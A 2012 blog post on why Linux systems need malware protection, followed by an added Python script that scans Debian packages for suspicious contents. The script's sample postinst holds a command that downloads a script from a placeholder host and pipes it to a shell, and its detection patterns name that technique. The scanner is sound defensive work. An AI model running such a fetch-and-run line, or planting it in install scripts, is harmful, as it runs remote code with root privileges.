Friday, October 12, 2012

Why Does Linux Need Malware Protection? How to Protect Your Linux


Why Does Linux Need Malware Protection?

“This is very embarrassing.” So began a post by the developers of the UnrealIRCd server after finding that the software was infected with a Trojan. Another example of why enterprises should consider the safe haven of Linux? Just the opposite: the Trojan infected only the Linux version of the server software, while its Windows counterpart was clean.

Although Linux malware is relatively rare compared to attacks on Windows, it exists, and it’s steadily increasing. In fact, as far back as 2005, the amount of known Linux malware had already doubled over the course of a year to 863 programs. As Linux’s popularity grows among consumers and enterprises, so does its attractiveness to hackers.

In the process, the strategy of security by obscurity becomes less viable. So far, Linux servers appear to be targeted more frequently than Linux PCs, partly because there’s a larger installed base. The risks are not limited to servers and desktops, either. One recent example is Backdoor.Linux.Foncy.a, “the most striking example of a malicious program used by cybercriminals to remotely control an infected device by sending a variety of commands.”

In a sense, Linux malware today is like mobile malware circa 2002: many businesses, consumers and analysts scoffed at warnings simply because attacks were so few and far between. But as the attacks mount, so does the need for a strategy that’s more robust than simply betting that the odds are in your favor.

Developing a Security Strategy

The good news is that many successful strategies from the Windows world are applicable to Linux.

  • Think twice about downloading free software and content even when it, the source or both appear innocuous. Ignoring that advice has facilitated hacks such as screensavers that use Ubuntu PCs for distributed denial-of-service attacks.

Backdoor.Linux.Foncy.a passed itself off as the “Madden NFL 12” game.

  • Run a Windows antivirus program. Because Linux PCs are still a minority, there’s a good chance that a file is headed for a Windows machine. Windows antivirus software minimizes the chance that the Linux PC or server will facilitate malware’s spread.

  • Borrow from Ronald Reagan: trust, but verify. For example, many Linux users trust Ubuntu’s Personal Package Archives. The potential catch is that although there’s a code of conduct, there’s no guarantee that a secretly malicious signatory won’t leverage that trust. Verification could include using only entities that have proven themselves to be trustworthy, or inspecting the files in a package for anything suspicious before installation.

There’s also a growing selection of books and Web tutorials for developing an enterprise Linux security strategy. For example, Cyberciti.biz advises: “Most Linux distro began enabling IPv6 protocol by default. Crackers can send bad traffic via IPv6 as most admins are not monitoring it. Unless network configuration requires it, disable IPv6 or configure Linux IPv6 firewall.”

  • Explore vendors offering Linux security services and products. There’s a good reason why they’re worth paying attention to: they wouldn’t have those lines of business if there weren’t enough threats already out there.

  • Don’t let managers and other supervisors blindly sign off on the wireless portion of expense reports. This advice is as low-tech as it gets, but it’s also highly effective, not just for Android malware but for types that target all other mobile OSes, too. Although a lot of malware is designed to harvest credit card numbers and other personal information, Backdoor.Linux.Foncy.a is an example of the types that send messages to premium-rate text message and other data services. By simply questioning why an expense report has an unusually high wireless bill that month, you could catch an infected smartphone before it has several months or more to incur unnecessary charges. In the case of Backdoor.Linux.Foncy.a, only about 2,000 Android phones were infected, but that was enough for the hackers, who were later arrested, to run up an estimated 100,000 euros in unauthorized charges.
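One way to carry out the “inspecting the files in a package” check from the “trust, but verify” item above, as an added example that is not from the original post. It assumes a .deb has already been unpacked into its control and data tar members, and the function names, path list and patterns are this example's own heuristics.

```python
import io, re, stat, tarfile

# Heuristics below are assumptions of this example, not a complete list.
PERSISTENCE_PATHS = ("etc/cron", "etc/init.d/", "etc/systemd/system/",
                     "etc/profile.d/", "etc/ld.so.preload")
SCRIPT_PATTERNS = {
    "download piped to a shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
    "base64 decode piped to a shell": re.compile(r"base64\s+(-d|--decode)[^\n|]*\|\s*(ba)?sh\b"),
}
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm", "config"}

def scan_data_tar(tar):
    """Flag setuid/setgid files and files dropped into startup paths."""
    findings = []
    for m in tar.getmembers():
        name = m.name.removeprefix("./")
        if m.isfile() and m.mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append((name, "setuid/setgid bit set"))
        if m.isfile() and name.startswith(PERSISTENCE_PATHS):
            findings.append((name, "installs into a startup path"))
    return findings

def scan_control_tar(tar):
    """Flag maintainer scripts (run as root by dpkg) matching SCRIPT_PATTERNS."""
    findings = []
    for m in tar.getmembers():
        base = m.name.rsplit("/", 1)[-1]
        if m.isfile() and base in MAINTAINER_SCRIPTS:
            text = tar.extractfile(m).read().decode("utf-8", "replace")
            findings += [(base, label) for label, rx in SCRIPT_PATTERNS.items()
                         if rx.search(text)]
    return findings

def build_tar(files):
    """Build an in-memory tar from {name: (mode, bytes)} for the constructed sample."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        for name, (mode, data) in files.items():
            info = tarfile.TarInfo(name)
            info.mode, info.size = mode, len(data)
            t.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return tarfile.open(fileobj=buf, mode="r")

if __name__ == "__main__":
    # Constructed sample package contents, not taken from any real package.
    control = build_tar({"./postinst": (0o755, b"#!/bin/sh\ncurl -s http://example.invalid/i.sh | sh\n")})
    data = build_tar({"./usr/bin/game": (0o4755, b"x"), "./etc/cron.d/game": (0o644, b"x")})
    for item, why in scan_control_tar(control) + scan_data_tar(data):
        print(f"REVIEW {item}: {why}")
```

For a real package, `ar x package.deb` yields the control and data tar members, which can be opened with `tarfile.open()` and passed to the two scan functions. A finding is a prompt to read the file before installing, not proof of malice, and a clean result does not prove the package is safe.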
